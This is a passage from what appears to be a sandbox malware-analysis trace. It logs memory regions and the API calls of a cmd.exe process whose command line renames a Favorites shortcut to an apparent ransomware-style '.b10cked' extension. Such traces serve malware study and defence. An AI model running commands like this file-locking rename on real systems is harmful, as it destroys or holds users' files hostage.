(normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31959 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31960 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31961 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31962 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31963 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31964 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 31965 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31966 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31967 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31968 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31969 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31970 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31971 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 31972 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 31973 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 741 os_tid = 0xad4 [0215.547] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd94 | out: lpSystemTimeAsFileTime=0x1efd94*(dwLowDateTime=0xb546d5a0, dwHighDateTime=0x1d440a9)) [0215.547] GetCurrentProcessId () returned 0xd40 [0215.547] 
GetCurrentThreadId () returned 0xad4 [0215.547] GetTickCount () returned 0x3c541 [0215.547] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd8c | out: lpPerformanceCount=0x1efd8c*=27233640765) returned 1 [0215.548] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.548] __set_app_type (_Type=0x1) [0215.548] __p__fmode () returned 0x76b331f4 [0215.548] __p__commode () returned 0x76b331fc [0215.548] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.548] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.548] GetCurrentThreadId () returned 0xad4 [0215.548] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xad4) returned 0x38 [0215.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.548] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.548] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.548] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.549] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efd24 | out: phkResult=0x1efd24*=0x0) returned 0x2 [0215.549] VirtualQuery (in: lpAddress=0x1efd5b, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.549] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.549] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efcf4, dwLength=0x1c | out: 
lpBuffer=0x1efcf4*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.549] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.549] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efcf4, dwLength=0x1c | out: lpBuffer=0x1efcf4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.549] GetConsoleOutputCP () returned 0x1b5 [0215.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.549] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.549] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.549] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.550] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.550] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.550] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.550] GetEnvironmentStringsW () returned 0x3b0198* [0215.550] FreeEnvironmentStringsW (penv=0x3b0198) returned 1 [0215.550] GetEnvironmentStringsW () returned 0x3b0198* [0215.550] FreeEnvironmentStringsW (penv=0x3b0198) returned 1 [0215.550] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec94 | out: 
phkResult=0x1eec94*=0x40) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0xc0, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x1, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x1, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x0, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x40, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x40, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.550] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x40, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.551] RegCloseKey (hKey=0x40) returned 0x0 [0215.551] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec94 | out: phkResult=0x1eec94*=0x40) returned 0x0 [0215.551] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x40, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x1, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x1, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x0, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x9, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x4, lpData=0x1eeca0*=0x9, lpcbData=0x1eec98*=0x4) returned 0x0 [0215.551] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec9c, lpData=0x1eeca0, lpcbData=0x1eec98*=0x1000 | out: lpType=0x1eec9c*=0x0, lpData=0x1eeca0*=0x9, lpcbData=0x1eec98*=0x1000) returned 0x2 [0215.551] RegCloseKey (hKey=0x40) returned 0x0 [0215.551] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.551] srand (_Seed=0x5b8863b1) [0215.551] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC 
News.url.b10cked\"" [0215.551] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"" [0215.551] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.551] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.551] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.552] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.552] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.552] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.552] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.552] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.552] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.552] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.552] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.552] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.552] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.552] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.552] GetEnvironmentStringsW () returned 0x3b22e8* [0215.552] FreeEnvironmentStringsW (penv=0x3b22e8) returned 1 [0215.552] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.552] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.552] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.552] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.552] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.552] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.552] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.552] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.552] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.552] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.552] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efa60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.552] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efa60, lpFilePart=0x1efa5c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efa5c*="Desktop") returned 0x18 [0215.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.552] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef7dc | out: lpFindFileData=0x1ef7dc) returned 0x3b0028 [0215.553] FindClose (in: hFindFile=0x3b0028 | out: hFindFile=0x3b0028) returned 1 [0215.553] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef7dc | out: lpFindFileData=0x1ef7dc) returned 0x3b0028 [0215.553] FindClose (in: hFindFile=0x3b0028 | out: hFindFile=0x3b0028) returned 1 [0215.553] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef7dc | out: lpFindFileData=0x1ef7dc) returned 0x3b0028 [0215.553] FindClose (in: hFindFile=0x3b0028 | out: hFindFile=0x3b0028) returned 1 [0215.553] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.553] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.553] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.553] GetEnvironmentStringsW () returned 0x3b2b08* [0215.553] FreeEnvironmentStringsW (penv=0x3b2b08) returned 1 [0215.553] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.554] GetConsoleOutputCP () returned 0x1b5 [0215.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.554] GetUserDefaultLCID () returned 0x409 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efba0, cchData=128 | out: lpLCData="0") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efba0, cchData=128 | out: lpLCData="0") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efba0, cchData=128 | out: lpLCData="1") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.555] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.555] GetConsoleTitleW (in: lpConsoleTitle=0x3a08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.556] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.556] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.556] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.556] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.556] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.556] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.556] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.556] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.557] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.557] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.557] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.559] GetConsoleTitleW (in: lpConsoleTitle=0x1ef898, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.559] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.559] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.559] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.559] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.559] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.559] _wcsicmp 
(_String1="move", _String2="CD") returned 10 [0215.559] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.559] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.559] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.559] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.559] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.559] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.560] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.560] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.560] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.560] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.560] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.560] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.560] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.560] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.560] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.560] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.560] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.560] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.560] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.560] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.560] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.560] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.560] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.560] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.560] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.560] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.560] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.560] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.560] _wcsicmp (_String1="move", _String2="MOVE") returned 0 
[0215.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.561] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef654, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef64c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef64c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.563] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.563] _wcsicmp (_String1="MSNBCN~1.URL", _String2=".") returned 63 [0215.563] _wcsicmp (_String1="MSNBCN~1.URL", _String2="..") returned 63 [0215.563] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbcn~1.url")) returned 0x20 [0215.563] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3b1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.563] SetErrorMode (uMode=0x0) 
returned 0x0 [0215.563] SetErrorMode (uMode=0x1) returned 0x0 [0215.563] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", nBufferLength=0x104, lpBuffer=0x1eefdc, lpFilePart=0x1eefc4 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", lpFilePart=0x1eefc4*="MSNBCN~1.URL") returned 0x2f [0215.563] SetErrorMode (uMode=0x0) returned 0x1 [0215.563] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.563] _wcsicmp (_String1="MSNBCN~1.URL", _String2=".") returned 63 [0215.563] _wcsicmp (_String1="MSNBCN~1.URL", _String2="..") returned 63 [0215.563] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbcn~1.url")) returned 0x20 